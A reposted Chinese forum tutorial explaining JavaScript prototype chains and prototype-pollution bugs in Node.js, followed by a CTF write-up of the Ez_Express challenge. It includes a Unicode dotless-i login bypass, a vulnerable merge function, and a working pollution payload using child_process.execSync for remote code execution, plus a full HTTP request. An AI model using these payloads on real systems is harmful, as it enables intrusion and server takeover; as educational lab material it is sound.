qidao123.com技术社区-IT企服评测·应用市场»论坛 软件与程序人生 后端开发 Java Nodejs原型链污染

Nodejs原型链污染

[复制链接]
发表于 2023-2-9 17:13:17 | 显示全部楼层 |阅读模式
Nodejs与JavaScript和JSON

有一些人在学习JavaScript时会分不清Nodejs和JavaScript之间的区别,如果没有node,那么我们的JavaScript代码则由浏览器中的JavaScript解析器进行解析。几乎所有的浏览器都配备了JavaScript的解析功能(最出名的就是google的v8), 这也是为什么我们能在f12中直接执行JavaScript的原因。 而Nodejs则是由这个解析器单独从浏览器中拿出来,并进行了一系列的处理,最后成为了一个可以在服务端运行JavaScript的环境。 这里看到一个很好的例子,学过java的师傅应该就明白了。
[img=720,303.3476394849785]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302091532798.png[/img]
那么JSON又是什么呢?简单概括一下就是JavaScript的对象表示方法,它表示的是声明对象的一种格式, 由于我们从前端接收到的数据基本都是字符串,因此在服务端如果要将这些字符串处理为其他格式,比如对象,就需要用到JSON了。
[img=720,183.11811023622047]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302091533719.png[/img]
原型对象(prototype)与原型连接点(__proto__)与原型链

[img=720,372.66331658291455]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302091533312.png[/img]
在c++或java这些面向对象的语言中,我们如果想要一个对象,首先需要使用关键字class声明一个类,再使用关键字new一个对象出来,但是在JavaScript中没有class以及类这种概念(为了简化编写JavaScript代码,ECMAScript 6后增加了class语法,但class其实只是一个语法糖)。 在JavaScript有这么两种声明对象的方式,为了好理解我们先引入类的思想。
  1. person=new Object()
  2. person.firstname="John";
  3. person.lastname="Doe";
  4. person.age=50;
  5. person.eyecolor="blue";
  7. 这种创建对象的方法还有另一种写法 如下
  8. person={firstname:"John",lastname:"Doe",age:50,eyecolor:"blue"};
  10. 这种方法通过直接实例化构造方法Object()来创建对象
复制代码
  1. function person(firstname,lastname,age,eyecolor)  这里创建了一个“类” 但是在JavaScript中叫做构造函数或者构造器
  2. {
  3.    this.firstname=firstname;
  4.    this.lastname=lastname;
  5.    this.age=age;
  6.    this.eyecolor=eyecolor;
  7. }
  8. var myFather=new person("John","Doe",50,"blue");    通过这个“类”实例化对象
  9. var myMother=new person("Sally","Rally",48,"green");
  11. 这种方法先创建构造函数 再实例化构造函数 构造函数function也属于Object 如果对这里为什么属于Object而不属于Function有疑问请继续阅读 下面会解释
复制代码
既然是通过实例化Object来创建对象或创建构造函数,在JavaScript中有两个很特殊的对象,Function() 和 Object() ,它们两个既是构造函数也是对象,作为对象是不是应该有一个“类”去作为他们的模板呢?
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
对于Object()来说,要声明这么一个构造函数我们可以使用关键字function来创建 。(在底层 使用function创建一个函数 其实就相当于这个过程)
  1. function Object()
  2. {
  4. }
  5. 在底层为
  6. var Object = new Function();
复制代码
那么对于Function自己这个对象,他是怎么来的呢?如果用Function.__proto__和Function.prototype进行比较,发现二者是全等的,所以Function创造了自己,也创造了Object,所以JavaScript中,所有函数都是对象,而对象是通过函数创建的。因此构造函数.prototype.__proto__应该是Object.prototype,而不是Function.prototype,Function的作用是创建而不是继承。


那么提到了__proto__和prototype我们就来说说这两个是什么东西。
首先我们要了解以下概念:
__proto__是任何一个对象拥有的属性
prototype是任何一个函数拥有的一个属性
比如
  1. person={firstname:"John",lastname:"Doe",age:50,eyecolor:"blue"};
复制代码
那么这个person对象就拥有了person.__proto__这个属性,而Object()我们刚才提到了是由Function创建来的一个构造函数,那么Object就天生有了Object.prototype。
1.某一对象的 __proto__指向它的prototype(原型对象), 也就是说如果直接访问person.__proto__ 那么就相当于访问了Object.prototype。
2.JavaScript使用prototype链实现继承机制。
3.构造函数xxx.prototype是一个对象,xxx.prototype也有自己的__proto__属性,并且可以继续指向它的的prototype。
4.Object.prototype.proto最终指向null,这也是所有原型链的终点。
5.从一个对象的__proto__不断向上指向原型对象,最终指向Objecct.prototype后,接着指向为Null,这一条链子就叫做原型链。
如果我们有如下代码:
  1. function Father() {
  2.    this.first_name = 'Donald'
  3.    this.last_name = 'Trump'
  4. }
  6. function Son() {
  7.    this.first_name = 'Melania'
  8. }
  10. Son.prototype = new Father()
  12. let son = new Son()
  13. console.log(`Name: ${son.first_name} ${son.last_name}`)
复制代码
那么按照上述说法 就有如下结构
[img=720,136.95216907675194]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302091534300.png[/img]
对于对象son,在调用son.last_name的时候,实际上JavaScript引擎会进行如下操作:

  • 在对象son中寻找last_name。
  • 如果找不到,则在son.__proto__中寻找last_name。
  • 如果仍然找不到,则继续在son.__proto__.__proto__中寻找last_name。
  • 依次寻找,直到找到null结束。
原型链污染

举个栗子
  1. // 这个对象直接实例化Object()
  2. let foo = {bar: 1}
  4. // foo.bar 此时为1
  5. console.log(foo.bar)
  7. // 修改foo的原型(即Object)
  8. foo.__proto__.bar = 2
  10. // 由于查找顺序的原因,foo.bar仍然是1
  11. console.log(foo.bar)
  13. // 此时再用Object创建一个空的zoo对象
  14. let zoo = {}
  16. // 查看zoo.bar
  17. console.log(zoo.bar)
复制代码

这里由于修改了foo.__proto__.bar 也就是修改了Object.bar,因此在后续的实例化对象中,新的对象会继承这一属性 造成了原型链污染。
在实际应用中,哪些情况下可能存在原型链能被攻击者修改的情况呢?
我们思考一下,哪些情况下我们可以设置__proto__的值呢?其实找找能够控制数组(对象)的“键名”的操作即可。
看下面代码,一个简单的对象clone:
  1. function merge(target, source) {
  2.    for (let key in source) {
  3.        if (key in source && key in target) {  
  4.            // 如果target与source有相同的键名 则让target的键值为source的键值
  5.            merge(target[key], source[key])
  6.        } else {
  7.            target[key] = source[key]  // 如果target与source没有相通的键名 则直接在target新建键名并赋给键值
  8.        }
  9.    }
  10. }
  11. let o1 = {}
  12. let o2 = {a: 1, "__proto__": {b: 2}}
  13. merge(o1, o2)
  14. console.log(o1.a, o1.b)
  16. o3 = {}
  17. console.log(o3.b)
复制代码

这里执行后发现,虽然两个对象成功clone,但是Object()并没用被污染,这是因为在创建o2时, __proto__是已经存在于o2中的属性了,解析器并不能将这个属性解析为键值,所以要用JSON去修改代码(前面我们说了 JSON是JavaScript的对象表示方法 可以将字符串转换为对象), 这样就可以使__proto__被成功解析成键名了。
  1. let o1 = {}
  2. let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
  3. merge(o1, o2)
  4. console.log(o1.a, o1.b)
  6. o3 = {}
  7. console.log(o3.b)
复制代码

漏洞复现

[GYCTF2020]Ez_Express

进入环境之后是一个登录页面,测试之后发现存在www.zip源码泄露,开始审计index.js
  1. var express = require('express');
  2. var router = express.Router();
  3. const isObject = obj => obj && obj.constructor && obj.constructor === Object;
  4. const merge = (a, b) => {
  5.  for (var attr in b) {
  6.    if (isObject(a[attr]) && isObject(b[attr])) {
  7.      merge(a[attr], b[attr]);
  8.    } else {
  9.      a[attr] = b[attr];
  10.    }
  11.   }
  12.  return a
  13. }
  14. const clone = (a) => {
  15.  return merge({}, a);
  16. }
  17. function safeKeyword(keyword) {
  18.  if(keyword.match(/(admin)/is)) {
  19.      return keyword
  20.   }
  22.  return undefined
  23. }
  25. router.get('/', function (req, res) {
  26.  if(!req.session.user){
  27.    res.redirect('/login');
  28.   }
  29.  res.outputFunctionName=undefined;
  30.  res.render('index',data={'user':req.session.user.user});
  31. });
  34. router.get('/login', function (req, res) {
  35.  res.render('login');
  36. });
  40. router.post('/login', function (req, res) {
  41.  if(req.body.Submit=="register"){
  42.   if(safeKeyword(req.body.userid)){
  43.    res.end("")
  44.   }
  45.    req.session.user={
  46.      'user':req.body.userid.toUpperCase(),
  47.      'passwd': req.body.pwd,
  48.      'isLogin':false
  49.    }
  50.    res.redirect('/');
  51.   }
  52.  else if(req.body.Submit=="login"){
  53.    if(!req.session.user){res.end("")}
  54.    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){
  55.      req.session.user.isLogin=true;
  56.    }
  57.    else{
  58.      res.end("")
  59.    }
  60.  
  61.   }
  62.  res.redirect('/'); ;
  63. });
  64. router.post('/action', function (req, res) {
  65.  if(req.session.user.user!="ADMIN"){res.end("")}
  66.  req.session.user.data = clone(req.body);
  67.  res.end("");  
  68. });
  69. router.get('/info', function (req, res) {
  70.  res.render('index',data={'user':res.outputFunctionName});
  71. })
  72. module.exports = router;
复制代码
看下面两段代码
  1. function safeKeyword(keyword) {
  2.  if(keyword.match(/(admin)/is)) {
  3.      return keyword
  4.   }
  6.  return undefined
  7. }
复制代码
  1. router.post('/login', function (req, res) {
  2.  if(req.body.Submit=="register"){
  3.   if(safeKeyword(req.body.userid)){
  4.    res.end("")
  5.   }
  6.    req.session.user={
  7.      'user':req.body.userid.toUpperCase(),
  8.      'passwd': req.body.pwd,
  9.      'isLogin':false
  10.    }
  11.    res.redirect('/');
  12.   }
  13.  else if(req.body.Submit=="login"){
  14.    if(!req.session.user){res.end("")}
  15.    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){
  16.      req.session.user.isLogin=true;
  17.    }
  18.    else{
  19.      res.end("")
  20.    }
  21.  
  22.   }
  23.  res.redirect('/'); ;
  24. });
复制代码
只有用admin登录才会return,keyword 否则返回undefined,返回undefined就会弹窗forbid word,如果username经过toUpperCase后不能与原来的匹配,或password错误,就会弹窗error passwd,这也是为什么题中说用户名只支持大写。
再看这段,就很恶心,如果username为ADMIN就不能登录,又不让用admin,又得用admin登录,这里就用到了JavaScript大小写的漏洞。
  1. if(req.session.user.user!="ADMIN"){res.end("")}
复制代码
所以用ADMıN来绕过,注意不是ADMiN,中间那个i是一个奇怪的字符,把username输入ADMıN直接注册就可以了(题目环境怪怪的 有的时候ADMıN 不行就试试admın),登录进去还给了flag的位置。
[img=550,301.64203612479474]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302091534805.png[/img]

这里试了试没啥用,继续看源码,上面提到了 merge clone操作可以控制键值和键名,从而达到污染。
  1. const merge = (a, b) => {
  2.  for (var attr in b) {
  3.    if (isObject(a[attr]) && isObject(b[attr])) {
  4.      merge(a[attr], b[attr]);
  5.    } else {
  6.      a[attr] = b[attr];
  7.    }
  8.   }
  9.  return a
  10. }const merge = (a, b) => {
  11.  for (var attr in b) {
  12.    if (isObject(a[attr]) && isObject(b[attr])) {
  13.      merge(a[attr], b[attr]);
  14.    } else {
  15.      a[attr] = b[attr];
  16.    }
  17.   }
复制代码
往下看找到调用clone的位置
  1. router.post('/action', function (req, res) {
  2.  if(req.session.user.user!="ADMIN"){res.end("")}
  3.  req.session.user.data = clone(req.body);
  4.  res.end("");  
  5. });
复制代码
也就是说我们可以在action路由下通过请求体来进行污染,原型链污染的位置找到了,接下来就是要找到可以用来控制键名和键值的对象。
看到这段:
  1. router.get('/info', function (req, res) {
  2.  res.render('index',data={'user':res.outputFunctionName});
  3. })
复制代码
render函数应该不陌生,在模板注入攻击(SSTI)中很常见, 这里将回显req的outputFunctionNmae渲染到了index中,那么我们是不是可以利用outputFunctionName进行SSTI从而达到rce呢?代码跟下来我们发现并没有outputFunctionName这个东西,也就是说它是我们可以用来污染原型链的载体,如果把Object的prototype中加上键名为outputFunctionName,键值为恶意payload的属性,那么在进行模板渲染时,是不是就会执行我们的恶意payload?
但是我们考虑一个问题,如何去修改Object的prototype ?(确实是可以的 但是有点麻烦 下面参考文章的最后一篇就是直接修改Object的prototypr)我们重新回到这段代码:
  1. router.post('/action', function (req, res) {
  2.  if(req.session.user.user!="ADMIN"){res.end("")}
  3.  req.session.user.data = clone(req.body);
  4.  res.end("");  
  5. });
复制代码
发现请求体被clone到了req.session.user.data中,对于req.session.user这个对象来说,它的__proto__属性是不是就是Object的prototype,所以我们可以修改了这个对象的__proto__从而达到目的。
  1. req.session.user={
  2.      'user':req.body.userid.toUpperCase(),
  3.      'passwd': req.body.pwd,
  4.      'isLogin':false
  5.    }
复制代码
SSTI的payload我也不是很懂,反正原理都是不断调用原型对象,最后找到一个可以用来rce的函数,payload和CVE-2019-10744是一样的,直接搬来用了。
  1. {"__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');//"}}
复制代码
污染成功后在info路由下调用res.outputFunctionName时,就像上面调用son.last_name的过程一样,最终调用到了Object的outputFunctionName ,并且要让__proto__为键名,要用JSON格式,所以要用burp拦包添加content type(在进行POST传参时必须有该头) 放个包做个参考,记得路由和传参方式也要改 再传payload。
  1. POST /action HTTP/1.1
  2. Host: 8f9161b2-5acd-465d-8854-969004e758fb.node4.buuoj.cn:81
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Referer: http://8f9161b2-5acd-465d-8854-969004e758fb.node4.buuoj.cn:81/login
  8. Accept-Encoding: gzip, deflate
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Cookie: session=s%3A1jilnCKBesMA5qC1gPlt6SPb18ntn7h7.4wyQ3TbDJtVXUhdOdErxMFKs6EcCnNrCkeUjRFYK3MY
  11. Content-Type: application/json
  12. Connection: close
  13. Content-Length: 137
  15. {"__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');//"}}
复制代码
在action路由下污染成功后,应该接着访问info路由进行SSTI,但是不知道为啥,我包发过去直接给flag了。
[img=720,332.1081081081081]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302091534691.png[/img]
更多靶场实验练习、网安学习资料,请点击这里>>
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
继续阅读请点击广告

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表

守听
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表